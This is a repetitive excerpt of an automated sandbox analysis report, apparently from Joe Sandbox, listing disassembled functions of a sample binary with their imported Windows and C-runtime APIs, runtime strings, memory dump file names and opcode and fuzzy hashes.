ReleaseSemaphore.KERNEL32 ref: 00007FF738DA88C6
LeaveCriticalSection.KERNEL32 ref: 00007FF738DA88D3
LeaveCriticalSection.KERNEL32 ref: 00007FF738DA88F3
LeaveCriticalSection.KERNEL32 ref: 00007FF738DA8918

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CriticalSection$Leave$EnterReleaseSemaphore
String ID:
API String ID: 2813224205-0
Opcode ID: 50ea73615dfd6b47d2567a6e8e39e4969aa7ea6ce91bc3410475d5b7992722e5
Instruction ID: 264fd9f904b92c0d170654bb26408d55b324b994eef08fb75805694a93a5e0cd
Opcode Fuzzy Hash: 50ea73615dfd6b47d2567a6e8e39e4969aa7ea6ce91bc3410475d5b7992722e5
Instruction Fuzzy Hash: 1201D263F1921662E645AF2ABC95265D261BF99772FC44535CD1D86380DE3C98C6D300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA9EC0 Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF738DA9ED8
OpenProcess.KERNEL32 ref: 00007FF738DA9EEF
CloseHandle.KERNEL32 ref: 00007FF738DA9EFD

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen
String ID:
API String ID: 2750122171-0
Opcode ID: 0481b6e7934421b3d5d1405471e27f862e5ab29bd4ffea2d44222b750cc16042
Instruction ID: 73c2e101ee36d02c1acb07e64deb3dca52b0d6b811b8625a696d398601fc890e
Opcode Fuzzy Hash: 0481b6e7934421b3d5d1405471e27f862e5ab29bd4ffea2d44222b750cc16042
Instruction Fuzzy Hash: D0F024A2A2D603B2FB147F704440038D1B19F08715F940934C52F483D0EE3DE5A9A270

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9EB03 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00007FF738D9EBAA

Strings

CCG , xrefs: 00007FF738D9EB26

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 46604ae227c626b1be511848d822de1d4529c5c54d514a26e591d6aa839660e6
Instruction ID: ab3feee8514c4104d63460ca4a6ec9715e4f84ef40df8d40637f71d94266aa67
Opcode Fuzzy Hash: 46604ae227c626b1be511848d822de1d4529c5c54d514a26e591d6aa839660e6
Instruction Fuzzy Hash: 5621F063E2851261FE6572388441778C1819F4E368FD84B32C52E837E1DDBFA888A329

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA3D00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF738DA3D28
GetCurrentThreadId.KERNEL32 ref: 00007FF738DA3D6A

Strings

T%p %d %s, xrefs: 00007FF738DA3D33
T%p %d V=%0X H=%p %s, xrefs: 00007FF738DA3D8F

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CurrentThread
String ID: T%p %d %s$T%p %d V=%0X H=%p %s
API String ID: 2882836952-2059990036
Opcode ID: fb28173ffc3efe5c2c797d80106deafb06b5f9291af923cbf097269bcea0b66e
Instruction ID: 962c13d26fac2fab25d0f653879e3b2cd4c82c3516a7d7636dcfb4efe25011ca
Opcode Fuzzy Hash: fb28173ffc3efe5c2c797d80106deafb06b5f9291af923cbf097269bcea0b66e
Instruction Fuzzy Hash: 23016133B1C602A1EA11AF56EC0446AE3A6BFC8BD0F984131ED4D87B51EE3DE445E754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9F210 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF738D9F24C
calloc.MSVCRT ref: 00007FF738D9F25B

Strings

C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF738D9F23E
!dso || dso == &__dso_handle, xrefs: 00007FF738D9F245

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: _assertcalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 615528074-4180103562
Opcode ID: 3ff3c1c08b56fb9e230e04f1b49c40747e94c7a2db62898a806f7c776ec9269e
Instruction ID: 22ea07d974aae43c6de24c2dc45429dba862154cf5f2f2f7dc37d550fbd8908b
Opcode Fuzzy Hash: 3ff3c1c08b56fb9e230e04f1b49c40747e94c7a2db62898a806f7c776ec9269e
Instruction Fuzzy Hash: CC017166B28703A5FB51AB95F8502B9E3A5AF487D0FC48130D90C8B781EE3DD985E364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9E1F0 Relevance: 6.3, APIs: 5, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF738D9E27E
memcpy.MSVCRT ref: 00007FF738D9E292
free.MSVCRT ref: 00007FF738D9E29D

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 498b3f5b9e13853de3fd77891ce67d711f26d8732301d510346af88e7737a2e8
Instruction ID: e385d1c1744213813cd61e9443f91e38e389692b93a467d1dba5f9fda090a42b
Opcode Fuzzy Hash: 498b3f5b9e13853de3fd77891ce67d711f26d8732301d510346af88e7737a2e8
Instruction Fuzzy Hash: 0F318623A69652A1FE667A12D100B7BD290BF4879CFD84531DD4E073C4DEBEE44CA628

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DAD380 Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF738DAD471

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
Instruction ID: 65a7945231990cfa34840dc3c35631c09aa012f6001f17ef51af1f640d608157
Opcode Fuzzy Hash: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
Instruction Fuzzy Hash: E3C10C63E2914166E7646A24C00033AD691BF08B68FB94234DA1D9F7C9CB3FF849A754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DAA7D0 Relevance: 6.3, APIs: 4, Instructions: 319COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF738DAA8C1

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
Instruction ID: d6121d9267d587cbd2bbbb87d9aa9abc5d357a24e71b98496b4c456f051a8e9d
Opcode Fuzzy Hash: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
Instruction Fuzzy Hash: 2BC1FA63E282C266F7616A258100379E6D1BF0C798FB54335CA1D1F7C5CA3EEC49A768

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9D760 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 315stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF738D9D7E3
strlen.MSVCRT ref: 00007FF738D9D8C3
strlen.MSVCRT ref: 00007FF738D9D938

Strings

_GLOBAL_, xrefs: 00007FF738D9D797

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: strlen
String ID: _GLOBAL_
API String ID: 39653677-770460502
Opcode ID: a980d7a97dd603dd885cedb4aa38cc9247ee4e0068a44f4649bb0ec17d10a106
Instruction ID: 085870537ef5d18a348d4da281afd205be69441efaf9baff6b699b6fa1af8240
Opcode Fuzzy Hash: a980d7a97dd603dd885cedb4aa38cc9247ee4e0068a44f4649bb0ec17d10a106
Instruction Fuzzy Hash: 6FD13633A186D5ADF760AF2194043FEBBA2AB09398F804035DA4D57789CF3D9549E324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DAD8C0 Relevance: 6.2, APIs: 4, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
Instruction ID: e5e293319b79760c722b2994cd8d22885c118a4782fdb5fff735ff66d4f5f94f
Opcode Fuzzy Hash: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
Instruction Fuzzy Hash: 7C91A873F282425AE7559F268100379E7A1BB18B94FA48131CE0D9F3C8DB3EE809D758

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DAAD10 Relevance: 6.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
Instruction ID: 97ebf1bd951585138ddc92b8cd3cae244c16b4a13dc325d5f6cf8e8771c45d45
Opcode Fuzzy Hash: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
Instruction Fuzzy Hash: E691B673F2929256E7659F25810033DE791AB08B94FB48331DE0D1B3C4DB3EE9099764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB9C50 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

basic_string::_M_construct null not valid, xrefs: 00007FF738DB9CE4, 00007FF738DB9D94, 00007FF738DB9E44

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: basic_string::_M_construct null not valid
API String ID: 0-3522614731
Opcode ID: 14aa54d20c428766249a2dcfb27d26650a5f1dce7f3d40a69184aa0789750512
Instruction ID: d0705d07c8f9f520389b8c5654c090567df42a31c17e49f5888870350703d01a
Opcode Fuzzy Hash: 14aa54d20c428766249a2dcfb27d26650a5f1dce7f3d40a69184aa0789750512
Instruction Fuzzy Hash: B351F763A29A91B0EB22BB16E000278F7A0AB4DFD4FD84431DE8E07755EE3DD855D314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB8980 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DB89BC, 00007FF738DB8A1A, 00007FF738DB8A7A
basic_string::basic_string, xrefs: 00007FF738DB89B5, 00007FF738DB8A13, 00007FF738DB8A73
basic_string::_S_construct null not valid, xrefs: 00007FF738DB8B0A

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: 7d8338a1e9edd29d1aec0803ef2ebf7c98187b021472197f0bb09db241f85474
Instruction ID: bebe6db1be0a7a53b95b56785074ad04b00a8ac00eeeaf71d6739c2194fcc242
Opcode Fuzzy Hash: 7d8338a1e9edd29d1aec0803ef2ebf7c98187b021472197f0bb09db241f85474
Instruction Fuzzy Hash: C84117A2F2565661EF11BB62E4543BDE3A1AB68BC4F844431DE0C0B346EE3DC589D354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB8FA0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DB8FDC, 00007FF738DB903A, 00007FF738DB909A
basic_string::basic_string, xrefs: 00007FF738DB8FD5, 00007FF738DB9033, 00007FF738DB9093
basic_string::_S_construct null not valid, xrefs: 00007FF738DB912A

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: 7d89f8512e7e65814ec1fac360f2fa8d0805d6f994624814b77e8e40921412a7
Instruction ID: 1d8d6a747a22bfb9da4be7edd446dfe2f9f79bb57cf35e6b623bee2a84b4d4e0
Opcode Fuzzy Hash: 7d89f8512e7e65814ec1fac360f2fa8d0805d6f994624814b77e8e40921412a7
Instruction Fuzzy Hash: D44136A2F26656B1FE01BB61E8543B8E3A1AB69BC4F844031CE0C0B341EE3DC449D394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBC170 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 161stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF738DBC1D5

